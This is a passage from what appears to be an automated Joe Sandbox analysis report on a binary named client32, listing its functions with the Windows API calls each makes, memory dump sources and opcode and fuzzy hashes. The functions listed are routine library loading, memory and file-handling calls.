                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Closewvsprintf
                                                                                                                                                                • String ID: Error %d closing regkey %x
                                                                                                                                                                • API String ID: 843752472-892920262
                                                                                                                                                                • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                                                                                                • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                                                                                                • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                                                                                                • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                                                                                                Function 111463D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,02FBB818,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                                                                                                  • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                • String ID: NSMTRACE
                                                                                                                                                                • API String ID: 4133054770-4175627554
                                                                                                                                                                • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                                                                                                • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                                                                                                • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                                                                                                • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                                                                                                Function 11025CD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID: psapi.dll
                                                                                                                                                                • API String ID: 1029625771-80456845
                                                                                                                                                                • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                                                                                                • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                                                                                                • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                                                                                                • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                                                                                                Function 11014F80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID: nslsp.dll
                                                                                                                                                                • API String ID: 1029625771-3933918195
                                                                                                                                                                • Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                                                                                                • Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
                                                                                                                                                                • Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                                                                                                • Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
                                                                                                                                                                Function 11074DC0 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 11074E1F
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1654520187-0
                                                                                                                                                                • Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                                                                                                • Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
                                                                                                                                                                • Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                                                                                                • Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
                                                                                                                                                                Function 1105FCF0 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1105FD93
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1105FDA8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1338273076-0
                                                                                                                                                                • Opcode ID: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                                                                                                • Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
                                                                                                                                                                • Opcode Fuzzy Hash: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                                                                                                • Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1
                                                                                                                                                                Function 1105EC90 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _malloc_memmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1183979061-0
                                                                                                                                                                • Opcode ID: 122672bb5393e061907174e6af5f55016b939f4fec596e378902c676719b8fee
                                                                                                                                                                • Instruction ID: db33143030e4a9298ca15ccbefe9b49d771c33472961b073c023ff9ae0ea679a
                                                                                                                                                                • Opcode Fuzzy Hash: 122672bb5393e061907174e6af5f55016b939f4fec596e378902c676719b8fee
                                                                                                                                                                • Instruction Fuzzy Hash: 98F0F47AE002666F9741CF2C9844896FBDCDF8A158314C4A2E999CB301D671EC0687E0
                                                                                                                                                                Function 110883D0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 110883EF
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalInitializeSection_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 453477542-0
                                                                                                                                                                • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                                                                                                • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                                                                                                • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                                                                                                • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                                                                                                Function 11144440 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                                                                                                • ExtractIconExA.SHELL32(?,00000000,00270311,000E03C5,00000001), ref: 11144498
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExtractFileIconModuleName
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3911389742-0
                                                                                                                                                                • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                                                                                                • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                                                                                                • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                                                                                                • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                                                                                                Function 11163DB7 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                                                                                                • __lock_file.LIBCMT ref: 11163DFE
                                                                                                                                                                  • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                                                                                                • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2800547568-0
                                                                                                                                                                • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                                                                                                • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                                                                                                • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                                                                                                • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                                                                                                Function 11144EA0 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                                                                                                  • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                                                                                                • GetLastError.KERNEL32(?,02FBB818,000000FF,?), ref: 11144ED5
                                                                                                                                                                • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,02FBB818,000000FF,?), ref: 11144EE5
                                                                                                                                                                Memory Dump Source
